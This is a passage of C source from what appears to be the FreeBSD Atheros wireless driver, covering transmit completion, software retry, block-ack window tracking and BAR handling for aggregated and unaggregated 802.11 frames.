an, atid, &bf_cq); /* Remove this tid from the list of active tids */ ath_tx_tid_unsched(sc, atid); /* Reset the per-TID pause, BAR, etc state */ ath_tx_tid_reset(sc, atid); } /* * Clear global leak count */ an->an_leak_count = 0; ATH_TX_UNLOCK(sc); /* Handle completed frames */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Drain all the software TXQs currently with traffic queued. */ void ath_tx_txq_drain(struct ath_softc *sc, struct ath_txq *txq) { struct ath_tid *tid; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_TX_LOCK(sc); /* * Iterate over all active tids for the given txq, * flushing and unsched'ing them */ while (! TAILQ_EMPTY(&txq->axq_tidq)) { tid = TAILQ_FIRST(&txq->axq_tidq); ath_tx_tid_drain(sc, tid->an, tid, &bf_cq); ath_tx_tid_unsched(sc, tid); } ATH_TX_UNLOCK(sc); while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle completion of non-aggregate session frames. * * This (currently) doesn't implement software retransmission of * non-aggregate frames! * * Software retransmission of non-aggregate frames needs to obey * the strict sequence number ordering, and drop any frames that * will fail this. * * For now, filtered frames and frame transmission will cause * all kinds of issues. So we don't support them. * * So anyone queuing frames via ath_tx_normal_xmit() or * ath_tx_hw_queue_norm() must override and set CLRDMASK. */ void ath_tx_normal_comp(struct ath_softc *sc, struct ath_buf *bf, int fail) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status *ts = &bf->bf_status.ds_txstat; /* The TID state is protected behind the TXQ lock */ ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: fail=%d, hwq_depth now %d\n", __func__, bf, fail, atid->hwq_depth - 1); atid->hwq_depth--; #if 0 /* * If the frame was filtered, stick it on the filter frame * queue and complain about it. It shouldn't happen! */ if ((ts->ts_status & HAL_TXERR_FILT) || (ts->ts_status != 0 && atid->isfiltered)) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=%d, ts_status=%d: huh?\n", __func__, atid->isfiltered, ts->ts_status); ath_tx_tid_filt_comp_buf(sc, atid, bf); } #endif if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: filtered?!\n", __func__); if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the queue is filtered, potentially mark it as complete * and reschedule it as needed. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. * * XXX should we do this before we complete the frame? */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); ATH_TX_UNLOCK(sc); /* * punt to rate control if we're not being cleaned up * during a hw queue drain and the frame wanted an ACK. */ if (fail == 0 && ((bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) == 0)) ath_tx_update_ratectrl(sc, ni, bf->bf_state.bfs_rc, ts, bf->bf_state.bfs_pktlen, 1, (ts->ts_status == 0) ? 0 : 1); ath_tx_default_comp(sc, bf, fail); } /* * Handle cleanup of aggregate session packets that aren't * an A-MPDU. * * There's no need to update the BAW here - the session is being * torn down. */ static void ath_tx_comp_cleanup_unaggr(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: incomp=%d\n", __func__, tid, atid->incomp); ATH_TX_LOCK(sc); atid->incomp--; if (atid->incomp == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleaned up! resume!\n", __func__, tid); atid->cleanup_inprogress = 0; ath_tx_tid_resume(sc, atid); } ATH_TX_UNLOCK(sc); ath_tx_default_comp(sc, bf, 0); } /* * Performs transmit side cleanup when TID changes from aggregated to * unaggregated. * * - Discard all retry frames from the s/w queue. * - Fix the tx completion function for all buffers in s/w queue. * - Count the number of unacked frames, and let transmit completion * handle it later. * * The caller is responsible for pausing the TID and unpausing the * TID if no cleanup was required. Otherwise the cleanup path will * unpause the TID once the last hardware queued frame is completed. */ static void ath_tx_tid_cleanup(struct ath_softc *sc, struct ath_node *an, int tid, ath_bufhead *bf_cq) { struct ath_tid *atid = &an->an_tid[tid]; struct ieee80211_tx_ampdu *tap; struct ath_buf *bf, *bf_next; ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: TID %d: called\n", __func__, tid); /* * Move the filtered frames to the TX queue, before * we run off and discard/process things. */ /* XXX this is really quite inefficient */ while ((bf = ATH_TID_FILT_LAST(atid, ath_bufhead_s)) != NULL) { ATH_TID_FILT_REMOVE(atid, bf, bf_list); ATH_TID_INSERT_HEAD(atid, bf, bf_list); } /* * Update the frames in the software TX queue: * * + Discard retry frames in the queue * + Fix the completion function to be non-aggregate */ bf = ATH_TID_FIRST(atid); while (bf) { if (bf->bf_state.bfs_isretried) { bf_next = TAILQ_NEXT(bf, bf_list); ATH_TID_REMOVE(atid, bf, bf_list); if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; /* * Call the default completion handler with "fail" just * so upper levels are suitably notified about this. */ TAILQ_INSERT_TAIL(bf_cq, bf, bf_list); bf = bf_next; continue; } /* Give these the default completion handler */ bf->bf_comp = ath_tx_normal_comp; bf = TAILQ_NEXT(bf, bf_list); } /* * Calculate what hardware-queued frames exist based * on the current BAW size. Ie, what frames have been * added to the TX hardware queue for this TID but * not yet ACKed. */ tap = ath_tx_get_tx_tid(an, tid); /* Need the lock - fiddling with BAW */ while (atid->baw_head != atid->baw_tail) { if (atid->tx_buf[atid->baw_head]) { atid->incomp++; atid->cleanup_inprogress = 1; atid->tx_buf[atid->baw_head] = NULL; } INCR(atid->baw_head, ATH_TID_MAX_BUFS); INCR(tap->txa_start, IEEE80211_SEQ_RANGE); } if (atid->cleanup_inprogress) DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleanup needed: %d packets\n", __func__, tid, atid->incomp); /* Owner now must free completed frames */ } static struct ath_buf * ath_tx_retry_clone(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf) { struct ath_buf *nbf; int error; /* * Clone the buffer. This will handle the dma unmap and * copy the node reference to the new buffer. If this * works out, 'bf' will have no DMA mapping, no mbuf * pointer and no node reference. */ nbf = ath_buf_clone(sc, bf); #if 0 DPRINTF(sc, ATH_DEBUG_XMIT, "%s: ATH_BUF_BUSY; cloning\n", __func__); #endif if (nbf == NULL) { /* Failed to clone */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: failed to clone a busy buffer\n", __func__); return NULL; } /* Setup the dma for the new buffer */ error = ath_tx_dmasetup(sc, nbf, nbf->bf_m); if (error != 0) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: failed to setup dma for clone\n", __func__); /* * Put this at the head of the list, not tail; * that way it doesn't interfere with the * busy buffer logic (which uses the tail of * the list.) */ ATH_TXBUF_LOCK(sc); ath_returnbuf_head(sc, nbf); ATH_TXBUF_UNLOCK(sc); return NULL; } /* Update BAW if required, before we free the original buf */ if (bf->bf_state.bfs_dobaw) ath_tx_switch_baw_buf(sc, an, tid, bf, nbf); /* Free original buffer; return new buffer */ ath_freebuf(sc, bf); return nbf; } /* * Handle retrying an unaggregate frame in an aggregate * session. * * If too many retries occur, pause the TID, wait for * any further retransmits (as there's no reason why * non-aggregate frames in an aggregate session are * transmitted in-order; they just have to be in-BAW) * and then queue a BAR. */ static void ath_tx_aggr_retry_unaggr(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK(sc); tap = ath_tx_get_tx_tid(an, tid); /* * If the buffer is marked as busy, we can't directly * reuse it. Instead, try to clone the buffer. * If the clone is successful, recycle the old buffer. * If the clone is unsuccessful, set bfs_retries to max * to force the next bit of code to free the buffer * for us. */ if ((bf->bf_state.bfs_retries < SWMAX_RETRIES) && (bf->bf_flags & ATH_BUF_BUSY)) { struct ath_buf *nbf; nbf = ath_tx_retry_clone(sc, an, atid, bf); if (nbf) /* bf has been freed at this point */ bf = nbf; else bf->bf_state.bfs_retries = SWMAX_RETRIES + 1; } if (bf->bf_state.bfs_retries >= SWMAX_RETRIES) { DPRINTF(sc, ATH_DEBUG_SW_TX_RETRIES, "%s: exceeded retries; seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); sc->sc_stats.ast_tx_swretrymax++; /* Update BAW anyway */ if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (! bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; /* Suspend the TX queue and get ready to send the BAR */ ath_tx_tid_bar_suspend(sc, atid); /* Send the BAR if there are no other frames waiting */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Free buffer, bf is free after this call */ ath_tx_default_comp(sc, bf, 0); return; } /* * This increments the retry counter as well as * sets the retry flag in the ath_buf and packet * body. */ ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swretries++; /* * Insert this at the head of the queue, so it's * retried before any current/subsequent frames. */ ATH_TID_INSERT_HEAD(atid, bf, bf_list); ath_tx_tid_sched(sc, atid); /* Send the BAR if there are no other frames waiting */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); } /* * Common code for aggregate excessive retry/subframe retry. * If retrying, queues buffers to bf_q. If not, frees the * buffers. * * XXX should unify this with ath_tx_aggr_retry_unaggr() */ static int ath_tx_retry_subframe(struct ath_softc *sc, struct ath_buf *bf, ath_bufhead *bf_q) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; ATH_TX_LOCK_ASSERT(sc); /* XXX clr11naggr should be done for all subframes */ ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); ath_hal_set11nburstduration(sc->sc_ah, bf->bf_desc, 0); /* ath_hal_set11n_virtualmorefrag(sc->sc_ah, bf->bf_desc, 0); */ /* * If the buffer is marked as busy, we can't directly * reuse it. Instead, try to clone the buffer. * If the clone is successful, recycle the old buffer. * If the clone is unsuccessful, set bfs_retries to max * to force the next bit of code to free the buffer * for us. */ if ((bf->bf_state.bfs_retries < SWMAX_RETRIES) && (bf->bf_flags & ATH_BUF_BUSY)) { struct ath_buf *nbf; nbf = ath_tx_retry_clone(sc, an, atid, bf); if (nbf) /* bf has been freed at this point */ bf = nbf; else bf->bf_state.bfs_retries = SWMAX_RETRIES + 1; } if (bf->bf_state.bfs_retries >= SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_RETRIES, "%s: max retries: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); bf->bf_state.bfs_dobaw = 0; return 1; } ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swretries++; bf->bf_next = NULL; /* Just to make sure */ /* Clear the aggregate state */ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_ndelim = 0; /* ??? needed? */ bf->bf_state.bfs_nframes = 1; TAILQ_INSERT_TAIL(bf_q, bf, bf_list); return 0; } /* * error pkt completion for an aggregate destination */ static void ath_tx_comp_aggr_error(struct ath_softc *sc, struct ath_buf *bf_first, struct ath_tid *tid) { struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); struct ath_buf *bf_next, *bf; ath_bufhead bf_q; int drops = 0; struct ieee80211_tx_ampdu *tap; ath_bufhead bf_cq; TAILQ_INIT(&bf_q); TAILQ_INIT(&bf_cq); /* * Update rate control - all frames have failed. * * XXX use the length in the first frame in the series; * XXX just so things are consistent for now. */ ath_tx_update_ratectrl(sc, ni, bf_first->bf_state.bfs_rc, &bf_first->bf_status.ds_txstat, bf_first->bf_state.bfs_pktlen, bf_first->bf_state.bfs_nframes, bf_first->bf_state.bfs_nframes); ATH_TX_LOCK(sc); tap = ath_tx_get_tx_tid(an, tid->tid); sc->sc_stats.ast_tx_aggr_failall++; /* Retry all subframes */ bf = bf_first; while (bf) { bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ sc->sc_stats.ast_tx_aggr_fail++; if (ath_tx_retry_subframe(sc, bf, &bf_q)) { drops++; bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } bf = bf_next; } /* Prepend all frames to the beginning of the queue */ while ((bf = TAILQ_LAST(&bf_q, ath_bufhead_s)) != NULL) { TAILQ_REMOVE(&bf_q, bf, bf_list); ATH_TID_INSERT_HEAD(tid, bf, bf_list); } /* * Schedule the TID to be re-tried. */ ath_tx_tid_sched(sc, tid); /* * send bar if we dropped any frames * * Keep the txq lock held for now, as we need to ensure * that ni_txseqs[] is consistent (as it's being updated * in the ifnet TX context or raw TX context.) */ if (drops) { /* Suspend the TX queue and get ready to send the BAR */ ath_tx_tid_bar_suspend(sc, tid); } /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, tid)) ath_tx_tid_bar_tx(sc, tid); ATH_TX_UNLOCK(sc); /* Complete frames which errored out */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle clean-up of packets from an aggregate list. * * There's no need to update the BAW here - the session is being * torn down. */ static void ath_tx_comp_cleanup_aggr(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf, *bf_next; struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf_first->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; ATH_TX_LOCK(sc); /* update incomp */ bf = bf_first; while (bf) { atid->incomp--; bf = bf->bf_next; } if (atid->incomp == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleaned up! resume!\n", __func__, tid); atid->cleanup_inprogress = 0; ath_tx_tid_resume(sc, atid); } /* Send BAR if required */ /* XXX why would we send a BAR when transitioning to non-aggregation? */ /* * XXX TODO: we should likely just tear down the BAR state here, * rather than sending a BAR. */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Handle frame completion */ bf = bf_first; while (bf) { bf_next = bf->bf_next; ath_tx_default_comp(sc, bf, 1); bf = bf_next; } } /* * Handle completion of an set of aggregate frames. * * Note: the completion handler is the last descriptor in the aggregate, * not the last descriptor in the first frame. */ static void ath_tx_aggr_comp_aggr(struct ath_softc *sc, struct ath_buf *bf_first, int fail) { //struct ath_desc *ds = bf->bf_lastds; struct ieee80211_node *ni = bf_first->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf_first->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status ts; struct ieee80211_tx_ampdu *tap; ath_bufhead bf_q; ath_bufhead bf_cq; int seq_st, tx_ok; int hasba, isaggr; uint32_t ba[2]; struct ath_buf *bf, *bf_next; int ba_index; int drops = 0; int nframes = 0, nbad = 0, nf; int pktlen; /* XXX there's too much on the stack? */ struct ath_rc_series rc[ATH_RC_NUM]; int txseq; DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: called; hwq_depth=%d\n", __func__, atid->hwq_depth); /* * Take a copy; this may be needed -after- bf_first * has been completed and freed. */ ts = bf_first->bf_status.ds_txstat; TAILQ_INIT(&bf_q); TAILQ_INIT(&bf_cq); /* The TID state is kept behind the TXQ lock */ ATH_TX_LOCK(sc); atid->hwq_depth--; if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the TID is filtered, handle completing the filter * transition before potentially kicking it to the cleanup * function. * * XXX this is duplicate work, ew. */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * Punt cleanup to the relevant function, not our problem now */ if (atid->cleanup_inprogress) { if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: isfiltered=1, normal_comp?\n", __func__); ATH_TX_UNLOCK(sc); ath_tx_comp_cleanup_aggr(sc, bf_first); return; } /* * If the frame is filtered, transition to filtered frame * mode and add this to the filtered frame list. * * XXX TODO: figure out how this interoperates with * BAR, pause and cleanup states. */ if ((ts.ts_status & HAL_TXERR_FILT) || (ts.ts_status != 0 && atid->isfiltered)) { if (fail != 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: isfiltered=1, fail=%d\n", __func__, fail); ath_tx_tid_filt_comp_aggr(sc, atid, bf_first, &bf_cq); /* Remove from BAW */ TAILQ_FOREACH_SAFE(bf, &bf_cq, bf_list, bf_next) { if (bf->bf_state.bfs_addedbaw) drops++; if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; } /* * If any intermediate frames in the BAW were dropped when * handling filtering things, send a BAR. */ if (drops) ath_tx_tid_bar_suspend(sc, atid); /* * Finish up by sending a BAR if required and freeing * the frames outside of the TX lock. */ goto finish_send_bar; } /* * XXX for now, use the first frame in the aggregate for * XXX rate control completion; it's at least consistent. */ pktlen = bf_first->bf_state.bfs_pktlen; /* * Handle errors first! * * Here, handle _any_ error as a "exceeded retries" error. * Later on (when filtered frames are to be specially handled) * it'll have to be expanded. */ #if 0 if (ts.ts_status & HAL_TXERR_XRETRY) { #endif if (ts.ts_status != 0) { ATH_TX_UNLOCK(sc); ath_tx_comp_aggr_error(sc, bf_first, atid); return; } tap = ath_tx_get_tx_tid(an, tid); /* * extract starting sequence and block-ack bitmap */ /* XXX endian-ness of seq_st, ba? */ seq_st = ts.ts_seqnum; hasba = !! (ts.ts_flags & HAL_TX_BA); tx_ok = (ts.ts_status == 0); isaggr = bf_first->bf_state.bfs_aggr; ba[0] = ts.ts_ba_low; ba[1] = ts.ts_ba_high; /* * Copy the TX completion status and the rate control * series from the first descriptor, as it may be freed * before the rate control code can get its grubby fingers * into things. */ memcpy(rc, bf_first->bf_state.bfs_rc, sizeof(rc)); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: txa_start=%d, tx_ok=%d, status=%.8x, flags=%.8x, " "isaggr=%d, seq_st=%d, hasba=%d, ba=%.8x, %.8x\n", __func__, tap->txa_start, tx_ok, ts.ts_status, ts.ts_flags, isaggr, seq_st, hasba, ba[0], ba[1]); /* * The reference driver doesn't do this; it simply ignores * this check in its entirety. * * I've seen this occur when using iperf to send traffic * out tid 1 - the aggregate frames are all marked as TID 1, * but the TXSTATUS has TID=0. So, let's just ignore this * check. */ #if 0 /* Occasionally, the MAC sends a tx status for the wrong TID. */ if (tid != ts.ts_tid) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: tid %d != hw tid %d\n", __func__, tid, ts.ts_tid); tx_ok = 0; } #endif /* AR5416 BA bug; this requires an interface reset */ if (isaggr && tx_ok && (! hasba)) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: AR5416 bug: hasba=%d; txok=%d, isaggr=%d, " "seq_st=%d\n", __func__, hasba, tx_ok, isaggr, seq_st); /* XXX TODO: schedule an interface reset */ #ifdef ATH_DEBUG ath_printtxbuf(sc, bf_first, sc->sc_ac2q[atid->ac]->axq_qnum, 0, 0); #endif } /* * Walk the list of frames, figure out which ones were correctly * sent and which weren't. */ bf = bf_first; nf = bf_first->bf_state.bfs_nframes; /* bf_first is going to be invalid once this list is walked */ bf_first = NULL; /* * Walk the list of completed frames and determine * which need to be completed and which need to be * retransmitted. * * For completed frames, the completion functions need * to be called at the end of this function as the last * node reference may free the node. * * Finally, since the TXQ lock can't be held during the * completion callback (to avoid lock recursion), * the completion calls have to be done outside of the * lock. */ while (bf) { nframes++; ba_index = ATH_BA_INDEX(seq_st, SEQNO(bf->bf_state.bfs_seqno)); bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: checking bf=%p seqno=%d; ack=%d\n", __func__, bf, SEQNO(bf->bf_state.bfs_seqno), ATH_BA_ISSET(ba, ba_index)); if (tx_ok && ATH_BA_ISSET(ba, ba_index)) { sc->sc_stats.ast_tx_aggr_ok++; ath_tx_update_baw(sc, an, atid, bf); bf->bf_state.bfs_dobaw = 0; if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } else { sc->sc_stats.ast_tx_aggr_fail++; if (ath_tx_retry_subframe(sc, bf, &bf_q)) { drops++; bf->bf_next = NULL; TAILQ_INSERT_TAIL(&bf_cq, bf, bf_list); } nbad++; } bf = bf_next; } /* * Now that the BAW updates have been done, unlock * * txseq is grabbed before the lock is released so we * have a consistent view of what -was- in the BAW. * Anything after this point will not yet have been * TXed. */ txseq = tap->txa_start; ATH_TX_UNLOCK(sc); if (nframes != nf) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: num frames seen=%d; bf nframes=%d\n", __func__, nframes, nf); /* * Now we know how many frames were bad, call the rate * control code. */ if (fail == 0) ath_tx_update_ratectrl(sc, ni, rc, &ts, pktlen, nframes, nbad); /* * send bar if we dropped any frames */ if (drops) { /* Suspend the TX queue and get ready to send the BAR */ ATH_TX_LOCK(sc); ath_tx_tid_bar_suspend(sc, atid); ATH_TX_UNLOCK(sc); } DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: txa_start now %d\n", __func__, tap->txa_start); ATH_TX_LOCK(sc); /* Prepend all frames to the beginning of the queue */ while ((bf = TAILQ_LAST(&bf_q, ath_bufhead_s)) != NULL) { TAILQ_REMOVE(&bf_q, bf, bf_list); ATH_TID_INSERT_HEAD(atid, bf, bf_list); } /* * Reschedule to grab some further frames. */ ath_tx_tid_sched(sc, atid); /* * If the queue is filtered, re-schedule as required. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. * * XXX should we do this before we complete the frame? */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); finish_send_bar: /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Do deferred completion */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle completion of unaggregated frames in an ADDBA * session. * * Fail is set to 1 if the entry is being freed via a call to * ath_tx_draintxq(). */ static void ath_tx_aggr_comp_unaggr(struct ath_softc *sc, struct ath_buf *bf, int fail) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status ts; int drops = 0; /* * Take a copy of this; filtering/cloning the frame may free the * bf pointer. */ ts = bf->bf_status.ds_txstat; /* * Update rate control status here, before we possibly * punt to retry or cleanup. * * Do it outside of the TXQ lock. */ if (fail == 0 && ((bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) == 0)) ath_tx_update_ratectrl(sc, ni, bf->bf_state.bfs_rc, &bf->bf_status.ds_txstat, bf->bf_state.bfs_pktlen, 1, (ts.ts_status == 0) ? 0 : 1); /* * This is called early so atid->hwq_depth can be tracked. * This unfortunately means that it's released and regrabbed * during retry and cleanup. That's rather inefficient. */ ATH_TX_LOCK(sc); if (tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=16!\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: tid=%d, hwq_depth=%d, seqno=%d\n", __func__, bf, bf->bf_state.bfs_tid, atid->hwq_depth, SEQNO(bf->bf_state.bfs_seqno)); atid->hwq_depth--; if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the TID is filtered, handle completing the filter * transition before potentially kicking it to the cleanup * function. */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * If a cleanup is in progress, punt to comp_cleanup; * rather than handling it here. It's thus their * responsibility to clean up, call the completion * function in net80211, etc. */ if (atid->cleanup_inprogress) { if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=1, normal_comp?\n", __func__); ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: cleanup_unaggr\n", __func__); ath_tx_comp_cleanup_unaggr(sc, bf); return; } /* * XXX TODO: how does cleanup, BAR and filtered frame handling * overlap? * * If the frame is filtered OR if it's any failure but * the TID is filtered, the frame must be added to the * filtered frame list. * * However - a busy buffer can't be added to the filtered * list as it will end up being recycled without having * been made available for the hardware. */ if ((ts.ts_status & HAL_TXERR_FILT) || (ts.ts_status != 0 && atid->isfiltered)) { int freeframe; if (fail != 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=1, fail=%d\n", __func__, fail); freeframe = ath_tx_tid_filt_comp_single(sc, atid, bf); if (freeframe) { /* Remove from BAW */ if (bf->bf_state.bfs_addedbaw) drops++; if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; } /* * If the frame couldn't be filtered, treat it as a drop and * prepare to send a BAR. */ if (freeframe && drops) ath_tx_tid_bar_suspend(sc, atid); /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* * If freeframe is set, then the frame couldn't be * cloned and bf is still valid. Just complete/free it. */ if (freeframe) ath_tx_default_comp(sc, bf, fail); return; } /* * Don't bother with the retry check if all frames * are being failed (eg during queue deletion.) */ #if 0 if (fail == 0 && ts->ts_status & HAL_TXERR_XRETRY) { #endif if (fail == 0 && ts.ts_status != 0) { ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: retry_unaggr\n", __func__); ath_tx_aggr_retry_unaggr(sc, bf); return; } /* Success? Complete */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=%d, seqno %d\n", __func__, tid, SEQNO(bf->bf_state.bfs_seqno)); if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); bf->bf_state.bfs_dobaw = 0; if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } /* * If the queue is filtered, re-schedule as required. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. * * XXX should we do this before we complete the frame? */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); /* * Send BAR if required */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); ath_tx_default_comp(sc, bf, fail); /* bf is freed at this point */ } void ath_tx_aggr_comp(struct ath_softc *sc, struct ath_buf *bf, int fail) { if (bf->bf_state.bfs_aggr) ath_tx_aggr_comp_aggr(sc, bf, fail); else ath_tx_aggr_comp_unaggr(sc, bf, fail); } /* * Schedule some packets from the given node/TID to the hardware. * * This is the aggregate version. */ void ath_tx_tid_hw_queue_aggr(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid) { struct ath_buf *bf; struct ath_txq *txq = 